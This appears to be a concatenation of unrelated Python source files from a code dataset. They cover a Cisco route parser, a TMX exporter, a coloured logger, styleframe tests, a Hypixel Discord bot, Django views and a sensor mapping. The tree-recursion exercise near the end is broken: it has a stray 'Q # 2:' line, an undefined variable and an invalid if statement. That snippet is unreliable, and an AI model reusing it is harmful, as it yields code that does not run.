NewRoute = Route_Template()
NewRoute.route = route["route"]
self.route_table[NewRoute.route] = NewRoute
# Check the detail for the route and append it to the object
def Add_Route_Detail(self,previous_route,line):
route = self.Get_Route_Object(previous_route)
route_patterns = [r'via (?P<next_hop>.*), (?P<interface>.*), (?P<metric>\[.*]), (?P<age>.*?), (?P<protocol>.*)', \
r'via (?P<next_hop>.*), (?P<metric>\[.*]), (?P<age>.*?), (?P<protocol>.*)']
for pattern in route_patterns:
match = re.search(pattern,line)
if match:
route.next_hop.append(match.group('next_hop').strip())
route.metric.append(match.group('metric').strip())
route.age.append(match.group('age').strip())
route.protocol.append(match.group('protocol').strip().replace(",","_"))
try:
route.interface.append(match.group('interface').strip())
except IndexError:
route.interface.append("N/A")
break
def Get_Host_Range(self,subnet):
try:
range = ipaddress.ip_network(subnet)
return range[1],range[-2]
except ValueError:
return "error", "error"
except IndexError: # Handles /32
return range[0], ""
def Generate_Output_To_File(self):
try:
with open('routes.csv', 'w', newline='') as csv_file:
spamwriter = csv.writer(csv_file, delimiter=',',
quotechar='|',
quoting=csv.QUOTE_MINIMAL)
spamwriter.writerow(['Route', 'Protocol','Metric','Next Hop','Age','Interface','From Range','To Range'])
for entry in sorted(self.route_table):
route = self.Get_Route_Object(entry)
first_ip, last_ip = self.Get_Host_Range(route)
for no in range(len(route.protocol)):
spamwriter.writerow([route.route,
route.protocol[no],
route.metric[no],
route.next_hop[no],
route.age[no],
route.interface[no],
first_ip,
last_ip])
print (" -- Output saved to 'routes.csv'")
except:
print (" -- Unable to write to routes.csv, if the file is already open close it.")
def Read_File(self):
start_processing_routes = False
invalid_phrases = ["subnetted"]
with open("routes.txt","r") as route_file:
for line in route_file:
#-----------------------
# Ignore certain input
#-----------------------
if line.count(' ') < 2:
continue
if any(x in line for x in invalid_phrases):
continue
if "<string>" in line:
start_processing_routes = True
continue
line = line.strip().replace("\n","")
if start_processing_routes:
regex = r'(?P<route>[0-9].*), ubest/mbest: (?P<value>.*)'
match = re.search(regex,line)
if match:
self.Create_New_Route(match)
last_route = match.group('route').strip()
continue
self.Add_Route_Detail(last_route, line)
print ("Cisco NXOS Route Parser version: '{}'".format(__version__))
c = RouteParse()
| StarcoderdataPython |
1750615 | """
Module for miscellaneous functions.
"""
import random
from collections import defaultdict
from string import letters
from lxml.builder import ElementMaker
from lxml import etree
def host_and_page(url):
""" Splits a `url` into the hostname and the rest of the url. """
url = url.split('//')[1]
parts = url.split('/')
host = parts[0]
page = "/".join(parts[1:])
return host, '/' + page
def read_from_url(url):
""" GET this `url` and read the response. """
import requests
response = requests.get(url)
return response.text
def write_tmx(stream, sentence_pairs, language_a, language_b):
""" Writes the SentencePair's out in tmx format, """
maker = ElementMaker()
token = "".join(random.sample(letters * 3, 50))
token_a = "".join(random.sample(letters * 3, 50))
token_b = "".join(random.sample(letters * 3, 50))
header = maker.header(srclang=language_a,
segtype="sentence",
creationtool="MTrans",
datatype="PlainText")
stream.write("<?xml version=\"1.0\" ?>\n")
stream.write("<!DOCTYPE tmx SYSTEM \"tmx14.dtd\">\n")
stream.write("<tmx version=\"1.4\">\n")
stream.write(etree.tostring(header, encoding="utf-8"))
stream.write("\n<body>\n")
for sentence_a, sentence_b in sentence_pairs:
src_tuv = maker.tuv({token: language_a}, maker.seg(token_a))
tgt_tuv = maker.tuv({token: language_b}, maker.seg(token_b))
tu = maker.tu(src_tuv, tgt_tuv)
tu_text = etree.tostring(tu, encoding="utf-8",
pretty_print=True)
tu_text = tu_text.replace(token, "xml:lang")
if sentence_a and sentence_b:
tu_text = tu_text.replace(token_a, sentence_a.to_text())
tu_text = tu_text.replace(token_b, sentence_b.to_text())
stream.write(tu_text)
stream.write("</body>\n</tmx>")
class CacheOfSizeOne(object):
""" Function wrapper that provides caching. """
f = None
def __init__(self, f):
self.f = f
self.args = None
self.kwargs = None
def __call__(self, *args, **kwargs):
if args != self.args or kwargs != self.kwargs:
self.result = self.f(*args, **kwargs)
self.args = args
self.kwargs = kwargs
return self.result
def __getattr__(self, name):
return getattr(self.f, name)
class Memoized(defaultdict):
def __missing__(self, key):
x = self.default_factory(key)
self[key] = x
return x
| StarcoderdataPython |
1633265 | <gh_stars>1-10
# -*- coding: utf-8 -*-
from collections import defaultdict
from logging import StreamHandler, DEBUG, getLogger as realGetLogger, Formatter
try:
from colorama import Fore, Back, init, Style
class ColourStreamHandler(StreamHandler):
""" A colorized output SteamHandler """
ansi_colours = {
'CYAN': Fore.LIGHTCYAN_EX,
'RED': Fore.LIGHTRED_EX,
'YELLOW': Fore.LIGHTYELLOW_EX,
'MAGENTA': Fore.LIGHTMAGENTA_EX,
'GREEN': Fore.GREEN,
'WHITE': Fore.LIGHTWHITE_EX
}
# Some basic colour scheme defaults
colours = {
'DEBUG': Fore.LIGHTRED_EX,
'INFO': Fore.LIGHTGREEN_EX,
'WARN': Fore.LIGHTYELLOW_EX,
'WARNING': Fore.LIGHTYELLOW_EX,
'ERROR': Fore.LIGHTRED_EX,
'CRIT': Back.RED + Fore.WHITE,
'CRITICAL': Back.RED + Fore.WHITE,
'MESSAGE': Back.MAGENTA
}
colours_letter = defaultdict(lambda: 'YELLOW')
colours_letter['='] = 'RED'
colours_letter['{'] = 'WHITE'
colours_letter['}'] = 'WHITE'
colours_letter['\''] = 'CYAN'
colours_letter[':'] = 'RED'
colours_letter['-'] = 'RED'
colours_letter['>'] = 'RED'
colours_letter['<'] = 'RED'
colours_letter['.'] = 'RED'
colours_letter[','] = 'RED'
@property
def is_tty(self):
""" Check if we are using a "real" TTY. If we are not using a TTY it means that
the colour output should be disabled.
:return: Using a TTY status
:rtype: bool
"""
try: return getattr(self.stream, 'isatty', None)()
except: return False
def emit(self, record):
try:
message = self.format(record)
if not self.is_tty:
self.stream.write(message)
else:
level_name = "[{0}] ".format(record.levelname)
self.stream.write(self.colours[record.levelname] + level_name + Style.RESET_ALL)
for letter in record.getMessage():
self.stream.write(self.ansi_colours[self.colours_letter[letter]] + letter + Style.RESET_ALL)
self.stream.write(getattr(self, 'terminator', '\n'))
self.flush()
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
has_colour = True
except:
has_colour = False
def getLogger(name=None, fmt='%(message)s'):
""" Get and initialize a colourised logging instance if the system supports
it as defined by the log.has_colour
:param name: Name of the logger
:type name: str
:param fmt: Message format to use
:type fmt: str
:return: Logger instance
:rtype: Logger
"""
log = realGetLogger(name)
# Only enable colour if support was loaded properly
handler = ColourStreamHandler() if has_colour else StreamHandler()
handler.setLevel(DEBUG)
handler.setFormatter(Formatter(fmt))
log.addHandler(handler)
log.setLevel(DEBUG)
log.propagate = 0 # Don't bubble up to the root logger
return log | StarcoderdataPython |
84009 | # -*- coding: utf-8 -*-
from __future__ import division, print_function
__all__ = ["simplexy"]
import numpy as np
from ._simplexy import simplexy as run_simplexy
_dtype = np.dtype([("x", np.float32), ("y", np.float32),
("flux", np.float32), ("bkg", np.float32)])
def simplexy(img, **kwargs):
r = run_simplexy(np.ascontiguousarray(img.T, dtype=np.float32),
**kwargs).T
return np.array(list(zip(*r)), dtype=_dtype)
| StarcoderdataPython |
1790591 | <gh_stars>100-1000
import unittest
import pandas as pd
from pandas.testing import assert_frame_equal
from styleframe import StyleFrame, Styler, Container, Series, utils
class SeriesTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.pandas_series = pd.Series((None, 1))
cls.sf_series = Series((Container(None), Container(1)))
def test_isnull(self):
self.assertTrue(all(p_val == sf_val
for p_val, sf_val in zip(self.pandas_series.isnull(), self.sf_series.isnull())))
def test_notnull(self):
self.assertTrue(all(p_val == sf_val
for p_val, sf_val in zip(self.pandas_series.notnull(), self.sf_series.notnull())))
def test_style_accessor(self):
sf = StyleFrame({'a': list(range(10))})
sf.apply_style_by_indexes(sf[sf['a'] % 2 == 0], styler_obj=Styler(bold=True, bg_color=utils.colors.yellow),
complement_style=Styler(bold=False, font=utils.fonts.calibri))
control_sf = StyleFrame({'a': list(range(0, 10, 2))})
test_sf = StyleFrame(sf.loc[sf['a'].style.font == utils.fonts.arial].reset_index(drop=True))
assert_frame_equal(control_sf.data_df, test_sf.data_df)
control_sf = StyleFrame({'a': list(range(0, 10, 2))})
test_sf = StyleFrame(sf.loc[sf['a'].style.bg_color == utils.colors.yellow].reset_index(drop=True))
assert_frame_equal(control_sf.data_df, test_sf.data_df)
control_sf = StyleFrame({'a': list(range(0, 10, 2))})
test_sf = StyleFrame(sf.loc[(sf['a'].style.bg_color == utils.colors.yellow)
&
sf['a'].style.font].reset_index(drop=True))
assert_frame_equal(control_sf.data_df, test_sf.data_df)
control_sf = StyleFrame({'a': list(range(1, 10, 2))})
test_sf = StyleFrame(sf.loc[sf['a'].style.font == utils.fonts.calibri].reset_index(drop=True))
assert_frame_equal(control_sf.data_df, test_sf.data_df)
control_sf = StyleFrame({'a': list(range(1, 10, 2))})
test_sf = StyleFrame(sf.loc[~sf['a'].style.bold].reset_index(drop=True))
assert_frame_equal(control_sf.data_df, test_sf.data_df)
control_sf = StyleFrame({'a': list(range(1, 10, 2))})
test_sf = StyleFrame(sf.loc[~sf['a'].style.bold
&
(sf['a'].style.font == utils.fonts.calibri)].reset_index(drop=True))
assert_frame_equal(control_sf.data_df, test_sf.data_df)
| StarcoderdataPython |
116156 | #!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# Copyright 2016 <NAME> <<EMAIL>>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Creates token_lengths.npy from a full corpus stored as an SQLite database.
The file contains the token length counts as a numpy array.
"""
import sys
import numpy as np
from tqdm import tqdm
from corpus import Corpus
def main(len=len):
_, filename = sys.argv
corpus = Corpus.connect_to(filename)
total = len(corpus)
array = np.empty(total, dtype=np.uint32)
MAX = 2**32 - 1
for i, tokens in enumerate(tqdm(corpus, total=total)):
n_tokens = len(tokens)
assert n_tokens <= MAX
array[i] = n_tokens
del tokens
np.save('token_lengths', array)
if __name__ == '__main__':
main()
| StarcoderdataPython |
1670426 | arr=list(map(int,input().split()))
low=0
mid=0
high=len(arr)-1
while(mid<=high):
if (arr[mid]==0):
arr[low],arr[mid]=arr[mid],arr[low]
low+=1
mid+=1
elif (arr[mid]==1):
mid+=1
else:
arr[mid],arr[high]=arr[high],arr[mid]
high-=1
print(arr)
| StarcoderdataPython |
4825439 | <filename>server/blogsley/image/__init__.py<gh_stars>1-10
from datetime import datetime
from slugify import slugify
from blogsley.config import db
class Image(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(255))
filename = db.Column(db.String(100))
src = db.Column(db.String(255))
timestamp = db.Column(db.DateTime, index=True, default=datetime.utcnow())
owner_id = db.Column(db.Integer, db.ForeignKey('user.id'))
| StarcoderdataPython |
3241699 | <reponame>TheShellLand/python
#!/usr/bin/env python
# -*- coding: utf8 -*-
import os
import requests
url = 'https://fpdl.vimeocdn.com/vimeo-prod-skyfire-std-us/01/4575/4/122877896/348642579.mp4?token' \
'=56957066_0x839f46c2194807f9e9fa0b07eaead9df817d2252'
local_dir = '/home/eric/Downloads'
def download_file(url):
os.chdir(local_dir)
local_filename = url.split('/')[-1]
# NOTE the stream=True parameter
r = requests.get(url, stream=True)
with open(local_filename, 'wb') as f:
chunk_downloaded = 0
for chunk in r.iter_content(chunk_size=1024):
print('Downloaded:', round(chunk_downloaded / 1024 / 1024, 2), 'MB')
if chunk: # filter out keep-alive new chunks
chunk_downloaded += 1024
f.write(chunk)
#f.flush() commented by recommendation from J.F.Sebastian
print('Total size:', chunk_downloaded / 1024, 'KB')
return local_filename
if __name__ == "__main__":
download_file(url)
| StarcoderdataPython |
1682632 | <gh_stars>0
from django.shortcuts import render, get_object_or_404, redirect
from django.views.generic import TemplateView
from django.contrib.auth.decorators import login_required
from django.utils.decorators import method_decorator
from .models import Publicaciones, Tematicas
from .forms import BibliotecaForms
# Create your views here.
class ListaBiblioteca(TemplateView):
template_name = "biblioteca.html"
def get_context_data(self, **kwargs):
context = super(ListaBiblioteca, self).get_context_data(**kwargs)
context['biblioteca_list'] = Publicaciones.objects.order_by('-fecha')
context['tematica'] = Tematicas.objects.all()
return context
@login_required
def bibliotecas_personales(request, template='admin/biblioteca_list_admin.html'):
object_list = Publicaciones.objects.filter(user_id=request.user.id)
return render(request, template, locals())
@login_required
def crear_biblioteca(request, template='admin/biblioteca_admin.html'):
if request.method == 'POST':
form = BibliotecaForms(request.POST, files=request.FILES)
if form.is_valid():
form_uncommited = form.save(commit=False)
form_uncommited.user = request.user
form_uncommited.save()
form.save_m2m()
#thread.start_new_thread(notify_all_notas, (form_uncommited,))
return redirect('biblioteca')
else:
form = BibliotecaForms()
return render(request, template, locals())
@login_required
def biblioteca_editar(request, id, template='admin/biblioteca_admin.html'):
object = get_object_or_404(Publicaciones, id=id)
if request.method == 'POST':
form = BibliotecaForms(request.POST, request.FILES, instance=object)
if form.is_valid() :
form_uncommited = form.save(commit=False)
form_uncommited.user = request.user
form_uncommited.save()
form.save_m2m()
return redirect('biblioteca')
else:
form = BibliotecaForms(instance=object)
return render(request, template, locals())
@login_required
def eliminar_biblioteca(request, id):
nota = Publicaciones.objects.filter(id = id).delete()
return redirect('biblioteca')
| StarcoderdataPython |
3370462 | <filename>compiler-rt/test/sanitizer_common/ios_commands/iossim_prepare.py
#!/usr/bin/python
import json
print(json.dumps({"env": {}}))
| StarcoderdataPython |
1722453 | <filename>commands/serverstats.py
import discord
from discord.ext import commands
from mojang import MojangAPI
from utils.utils import hypixel, utils
from utils.embeds import Embeds
import random
import datetime
import time as thyme
import mystbin
import re
mystbin_client = mystbin.MystbinClient()
class ServerStats(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(aliases=['lb'])
async def leaderboard(self, ctx, game: str=None, *, typevar: str=None):
if ctx.guild is not None:
me = ctx.guild.get_member(self.bot.user.id)
perms = ctx.channel.permissions_for(me)
if perms.send_messages:
if not perms.embed_links:
await ctx.send("Error: Cannot send embeds in this channel. Please contact a server administrator to fix this issue.")
return
if perms.embed_links:
pass
if not perms.send_messages:
return
if game is None:
embed = discord.Embed(title="Error", description="""Please provide a game.""", color=0xff0000)
await ctx.send(embed=embed)
return
if typevar is None:
embed = discord.Embed(title="Error", description="""Please provide a leaderboard.""", color=0xff0000)
await ctx.send(embed=embed)
return
if not typevar.lower().startswith('overall') and not typevar.lower().startswith('monthly') and not typevar.lower().startswith('weekly') and not typevar.lower().startswith('daily'):
t = "Overall " + typevar
typevar = t
if typevar.lower() == 'overall level':
typevar = "Current Level"
#send request
data = await hypixel.leaderboards()
#errors
if data['success'] == False:
embed = discord.Embed(title="Error", description="""Something went wrong.""", color=0xff0000)
await ctx.send(embed=embed)
return
#it worked!
elif data['success'] == True:
game = game.upper()
typevar = typevar.lower()
leaders = None
title = None
for lb in data['leaderboards']:
if lb == game.upper():
for reekid in data['leaderboards'][lb]:
titl = reekid['prefix'] + " " + reekid['title']
if titl.lower() == typevar:
title = reekid['prefix'] + " " + reekid['title']
leaders = reekid['leaders']
break
if leaders is None:
embed = discord.Embed(title='Error', description='Invalid leaderboard.', color=0xff0000)
await ctx.send(embed=embed)
return
msg = ''
num = 0
async with ctx.channel.typing():
for uid in leaders:
uid = uid.replace('-','')
name = await hypixel.getname(uid)
if name is None:
name = 'N/A'
num += 1
msg += f"{num}: {name}\n"
color=random.randint(1, 16777215)
embed = discord.Embed(title=f'{game.lower().capitalize()}: {title} leaderboard', description=msg, color=color)
embed.set_footer(text='Unofficial Hypixel Discord Bot')
await ctx.send(embed=embed)
@commands.command(aliases=['players','count', 'pc'])
async def playercount(self, ctx):
perms = None
if ctx.guild is not None:
me = ctx.guild.get_member(self.bot.user.id)
perms = ctx.channel.permissions_for(me)
if perms.send_messages:
if not perms.embed_links:
await ctx.send("Error: Cannot send embeds in this channel. Please contact a server administrator to fix this issue.")
return
if perms.embed_links:
if not perms.add_reactions:
embed=discord.Embed(title="Error", description="Cannot add reactions in this channel. Please contact a server administrator to fix this issue.", color=0xff0000)
await ctx.send(embed=embed)
return
if perms.add_reactions:
pass
if not perms.send_messages:
return
data = await hypixel.counts()
if data['success'] == True:
embeds, paginator = await Embeds().PlayerCount().generate(ctx, data, perms)
await paginator.run(embeds)
else:
embed = discord.Embed(title="Error", description="""Couldn't retrieve Hypixel player counts. Please try again later.""", color=0xff0000)
await ctx.send(embed=embed)
return
@commands.command(aliases=['g'])
async def guild(self, ctx, *, guildname:str=None):
if ctx.guild is not None:
me = ctx.guild.get_member(self.bot.user.id)
perms = ctx.channel.permissions_for(me)
if perms.send_messages:
if not perms.embed_links:
await ctx.send("Error: Cannot send embeds in this channel. Please contact a server administrator to fix this issue.")
return
if perms.embed_links:
pass
if not perms.send_messages:
return
if guildname is None:
embed = discord.Embed(title="Error", description='Please provide a guild to search for.', color=0xff0000)
await ctx.send(embed=embed)
return
gnamesearch = guildname.replace(' ','%20')
try:
data = await hypixel.guild(gnamesearch)
except ValueError:
embed = discord.Embed(title="Error", description="""The guild """ + guildname + ' does not exist.', color=0xff0000)
await ctx.send(embed=embed)
return
try:
glevel = utils.guildlevel(xp=data['guild']['exp'])
except:
glevel = 'N/A'
try:
gname = data['guild']['name']
except:
gname = 'N/A'
try:
time = datetime.fromtimestamp(data['guild']['created']/1000.0)
date = time.strftime("%m/%d/%Y")
minute = time.strftime("%M")
if int(time.strftime('%H')) == 12:
ampm = 'PM'
hour = time.strftime('%H')
elif int(time.strftime('%H')) > 12:
hour = int(time.strftime('%H')) - 12
ampm = 'PM'
elif int(time.strftime('%H')) < 12:
ampm = 'AM'
hour = time.strftime('%H')
else: #this should never happen
hour = None
ampm = None
created = str(date) + ' at ' + str(hour) + ':' + str(minute) + ' ' + ampm + ', EST'
except:
created = 'N/A'
try:
desc = data['guild']['description']
except:
desc = 'N/A'
try:
tag = data['guild']['tag']
except:
tag = 'N/A'
try:
mbrs = len(data['guild']['members'])
except:
mbrs = 'N/A'
try:
gmuuid = data['guild']['members'][0]['uuid']
gm = await hypixel.getname(gmuuid)
if gm is None:
gm = 'N/A'
except:
gm = 'N/A'
color=random.randint(1, 16777215)
embed = discord.Embed(title='Guild Info', color=color)
embed.add_field(name="Guild Name", value=str(gname), inline=True)
embed.add_field(name="Guild Manager", value=str(gm), inline=True)
embed.add_field(name="Members", value=str(utils.comma(mbrs)), inline=True)
embed.add_field(name="Created On", value=str(created), inline=True)
embed.add_field(name="Guild Level", value=str(utils.comma(glevel)), inline=True)
embed.add_field(name="Guild Description", value=str(desc), inline=True)
embed.add_field(name="Guild Tag", value=str(tag), inline=True)
embed.set_footer(text='Unofficial Hypixel Discord Bot')
await ctx.send(embed=embed)
@commands.command(aliases=['wd'])
async def watchdog(self, ctx):
perms = None
if ctx.guild is not None:
me = ctx.guild.get_member(self.bot.user.id)
perms = ctx.channel.permissions_for(me)
if perms.send_messages:
if not perms.embed_links:
await ctx.send("Error: Cannot send embeds in this channel. Please contact a server administrator to fix this issue.")
return
if perms.embed_links:
pass
if not perms.send_messages:
return
data = await hypixel.watchdog()
if data['success'] == True:
try:
wdtotal = data['watchdog_total']
except:
wdtotal = 'N/A'
try:
stafftotal = data['staff_total']
except:
stafftotal = 'N/A'
color=random.randint(1, 16777215)
embed = discord.Embed(title="Hypixel Watchdog Statistics", color = color)
embed.add_field(name="Watchdog Bans", value=str(utils.comma(wdtotal)))
embed.add_field(name="Staff Bans", value=str(utils.comma(stafftotal)))
try:
embed.add_field(name="Total Bans", value=str(utils.comma(wdtotal+stafftotal)))
except:
embed.add_field(name="Total Bans", value='N/A')
embed.set_footer(text='Unofficial Hypixel Discord Bot')
await ctx.send(embed=embed)
@commands.command(aliases=['boosts'])
@commands.cooldown(1, 3600, commands.BucketType.user)
async def boosters(self, ctx, *, game:str=None):
if ctx.guild is not None:
me = ctx.guild.get_member(self.bot.user.id)
perms = ctx.channel.permissions_for(me)
if perms.send_messages:
if not perms.embed_links:
await ctx.send("Error: Cannot send embeds in this channel. Please contact a server administrator to fix this issue.")
return
if perms.embed_links:
pass
if not perms.send_messages:
return
color=random.randint(1, 16777215)
if game is None:
try:
number = await hypixel.boosters()
except ValueError:
embed = discord.Embed(title="Hypixel Boosters", description=f"There are currently 0 boosters active on the network.", color=color)
await ctx.send(embed=embed)
return
embed = discord.Embed(title="Hypixel Boosters", description=f"There are {utils.comma(number)} boosters on the Hypixel Network.\nFor boosters for a specific gamemode, please run `h!boosters <game>`.", color=color)
await ctx.send(embed=embed)
return
try:
data = await hypixel.boosters('id')
except ValueError:
embed = discord.Embed(title="Hypixel Boosters", description=f"There are currently 0 boosters active on the network.", color=color)
await ctx.send(embed=embed)
return
_game = game.replace(' ','_')
try:
id = utils.gameidconverter(_game)
except ValueError:
embed = discord.Embed(title="Error", description=f"Invalid game.", color=0xff0000)
await ctx.send(embed=embed)
return
msg1 = ''
amnt = 0
embed = discord.Embed(title="Hypixel Boosters", description=f"Collecting data, please wait.\nThis message will be edited once data is ready.", color=color)
embed.set_footer(text='Unofficial Hypixel Discord Bot')
message = await ctx.send(embed=embed)
for booster in data:
if booster['gameType'] == id:
user = await hypixel.getname(booster['purchaserUuid'])
msg1 += f"{user} - ID: {booster['_id']}\n"
amnt += 1
if msg1 == '':
msg1 = f"There are currently 0 {game.lower().capitalize()} boosters active."
paste = await mystbin_client.post(msg1.replace('\\', ''), syntax="text")
url = str(paste)
embed = discord.Embed(title="Hypixel Boosters", description=f"There are {amnt} {game.lower().capitalize()} boosters on the network.\nBoosters have been uploaded to {url}.", color=color)
embed.set_footer(text='Unofficial Hypixel Discord Bot')
await message.edit(embed=embed)
embed = discord.Embed(title=f"Your data is ready!", description=f"I have collected all of the {game.lower().capitalize()} boosters.\n[Jump to message]({message.jump_url})", color=color)
embed.set_footer(text='Unofficial Hypixel Discord Bot')
await ctx.send(f"{ctx.author.mention}", embed=embed)
self.boosters.reset_cooldown(ctx)
@commands.command(aliases=['boost'])
async def booster(self, ctx, booster: str=None):
if ctx.guild is not None:
me = ctx.guild.get_member(self.bot.user.id)
perms = ctx.channel.permissions_for(me)
if perms.send_messages:
if not perms.embed_links:
await ctx.send("Error: Cannot send embeds in this channel. Please contact a server administrator to fix this issue.")
return
if perms.embed_links:
pass
if not perms.send_messages:
return
color=random.randint(1, 16777215)
current = int(thyme.time())
if booster is None:
embed = discord.Embed(title="Error", description="""Please provide a booster ID.""", color=0xff0000)
await ctx.send(embed=embed)
return
try:
data = await hypixel.boosters('all')
except discord.NotFound:
embed = discord.Embed(title="Hypixel Boosters", description=f"There are currently 0 boosters active on the network.", color=color)
await ctx.send(embed=embed)
return
info = ''
for i in data:
if i['_id'] == booster:
info = i
break
if info == '':
embed = discord.Embed(title="Hypixel Boosters", description=f"Invalid booster.", color=0xff0000)
await ctx.send(embed=embed)
return
exp = 'N/A'
passed = current-(info['dateActivated']/1000)
remaining = info['length']-passed
seconds = int(float(remaining))
min, sec = divmod(seconds, 60)
hour, min = divmod(min, 60)
if hour == 0:
if min == 0:
exp = f'{sec} seconds'
elif min > 0:
if len(str(min)) == 1:
if len(str(sec)) == 1:
exp = f"0:0{min}:0{sec}"
else:
exp = f"0:0{min}:{sec}"
else:
if len(str(sec)) == 1:
exp = f"0:{min}:0{sec}"
else:
exp = f"0:{min}:{sec}"
elif hour > 0:
if len(str(hour)) == 1:
if len(str(min)) == 1:
exp = f"0{hour}:0{min}"
else:
exp = f"0{hour}:{min}"
else:
exp = f"{hour}:{min}"
try:
user = await hypixel.getname(info['purchaserUuid'])
if user is None:
embed = discord.Embed(title="Error", description="""Something went wrong. Please try again later.""", color=0xff0000)
await ctx.send(embed=embed)
return
except:
user = 'N/A'
try:
uuid = info['purchaserUuid']
except:
uuid = 'N/A'
try:
multiplier = info['amount']
except:
multiplier = 'N/A'
try:
length = 'N/A'
seconds = int(float(info['originalLength']))
min, sec = divmod(seconds, 60)
hour, min = divmod(min, 60)
if hour == 0:
if min == 0:
length = f'0:{sec}'
elif min > 0:
if len(str(min)) == 1:
if len(str(sec)) == 1:
length = f"0:0{min}:0{sec}"
else:
length = f"0:0{min}:{sec}"
else:
if len(str(sec)) == 1:
length = f"0:{min}:0{sec}"
else:
length = f"0:{min}:{sec}"
elif hour > 0:
if len(str(hour)) == 1:
if len(str(min)) == 1:
length = f"0{hour}:0{min}"
else:
length = f"0{hour}:{min}"
else:
length = f"{hour}:{min}"
except:
length = 'N/A'
try:
time = datetime.fromtimestamp(info['dateActivated']/1000.0)
started = time.strftime("%m/%d/%Y at %H:%M EST")
except:
started = 'N/A'
try:
game = utils.idtogameconverter(int(info['gameType']))
except:
game = 'N/A'
color=random.randint(1, 16777215)
embed = discord.Embed(title=f"{user}'s {game} booster", color = color)
embed.set_thumbnail(url='https://crafatar.com/renders/head/' + uuid)
embed.add_field(name="Player", value=user)
embed.add_field(name="Game", value=game)
embed.add_field(name="Multiplier", value=multiplier)
embed.add_field(name="Started", value=started)
embed.add_field(name="Duration", value=length)
embed.add_field(name="Time Remaining", value=exp)
embed.set_footer(text='Unofficial Hypixel Discord Bot')
await ctx.send(embed=embed)
@commands.command()
async def status(self, ctx):
color=random.randint(1, 16777215)
data = await hypixel.status()
cmpnts = ''
for component in data['components']:
if component['group_id'] == None:
s = component['status'].split('_')
status = ''
for i in s:
status += f"{i.capitalize()} "
cmpnts += f"{component['name']}: {status}\n"
embed = discord.Embed(title="Hypixel Status", description=cmpnts, color=color)
updat = data['page_status']['page']['updated_at'].split('T')
updatd2 = updat[1].split('.')[0]
try:
current = data["months"][0]["incidents"][0]
timestamp = re.sub(r"<var data-var='date'>|</var>|<var data-var='time'>", "", current["timestamp"])
if 'been resolved' in current['message'].lower() or 'completed' in current['message'].lower():
raise IndexError
embed.add_field(name=f"{current['name']}", value=f"{current['message']}\nImpact: {current['impact'].capitalize()}\nIncident created {timestamp}")
except IndexError:
pass
embed.set_footer(text=f"Unofficial Hypixel Discord Bot - Status updated {updat[0]} at {updatd2}")
await ctx.send(embed=embed)
def setup(bot):
bot.add_cog(ServerStats(bot))
| StarcoderdataPython |
1763850 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
('events', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Activity',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('created_at', models.DateTimeField(help_text='creation date', auto_now_add=True)),
('updated_at', models.DateTimeField(help_text='edition date', auto_now=True, null=True)),
('name', models.CharField(max_length=50, verbose_name='name')),
('description', models.CharField(max_length=1500, verbose_name='description')),
('start_date', models.DateTimeField(verbose_name='start date')),
('end_date', models.DateTimeField(null=True, verbose_name='final date')),
('address', models.CharField(max_length=50, verbose_name='address')),
('quota', models.IntegerField(verbose_name='quota')),
('is_active', models.BooleanField(default=True, verbose_name='is active')),
('event', models.ForeignKey(related_name='events', on_delete=django.db.models.deletion.SET_NULL, verbose_name='event', to='events.Event', null=True)),
('manager', models.ForeignKey(related_name='activities_activity_manager', verbose_name='manager', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
]
| StarcoderdataPython |
11116 | # Write a recursive function to count the number of nodes in a Tree. (first do your self then see code)
def count_nodes(self):
count = 1
left_count = 0
right_count = 0
if self.left:
left_count = self.left.count_nodes()
if self.right:
right_count = self.right.count_nodes()
return count + left_count + right_count
Q # 2:
'''The height of a tree is the maximum number of levels in the tree. So, a tree with just one node has a height of 1. If the root has children which are leaves, the height of the tree is 2.
The height of a TreeNode can be computed recursively using a simple algorithm: The height Of a TreeNode With no children is 1. If it has children the height is: max of height of its two sub-trees + 1.
Write a clean, recursive function for the TreeNode class that calculates the height based on the above statement(first do your self then see code) '''
def get_height(self):
height = 1
left_height = 0
right_height = 0
if self.left:
left_height = self.left.get_height()
if self.right:
right_height = self.right.get_height()
return count + max(left_height, right_height)
print(self.val)
if self.left.val > self.val or self.right.val < self.val
return False
| StarcoderdataPython |
3238852 | <reponame>HSZemi/sensorid-collect<gh_stars>0
#! /usr/bin/env python3
import sys
import argparse
import json
import os
import csv
from features import *
# create a mapping of all known sensor classes to all known sensor names
def classes(directory):
sensors = {}
sensors['TYPE_ACCELEROMETER'] = []
sensors['TYPE_ACCELEROMETER'].append('BMA150 3-axis Accelerometer')
sensors['TYPE_ACCELEROMETER'].append('Invensense Accelerometer')
sensors['TYPE_ACCELEROMETER'].append('Invensense Accelerometer -Wakeup Secondary')
sensors['TYPE_ACCELEROMETER'].append('LGE Accelerometer Sensor')
sensors['TYPE_ACCELEROMETER'].append('MPU-6050 Accelerometer')
sensors['TYPE_ACCELEROMETER'].append('BMI160 accelerometer')
sensors['TYPE_GRAVITY'] = []
sensors['TYPE_GRAVITY'].append('Gravity')
sensors['TYPE_GRAVITY'].append('Gravity Sensor')
sensors['TYPE_GRAVITY'].append('Invensense Gravity')
sensors['TYPE_GRAVITY'].append('Invensense Gravity-Wakeup Secondary')
sensors['TYPE_GYROSCOPE'] = []
sensors['TYPE_GYROSCOPE'].append('Invensense Gyroscope')
sensors['TYPE_GYROSCOPE'].append('Invensense Gyroscope -Wakeup Secondary')
sensors['TYPE_GYROSCOPE'].append('Invensense Gyroscope Uncalibrated')
sensors['TYPE_GYROSCOPE'].append('Invensense Gyroscope Uncalibrated -Wakeup Secondary')
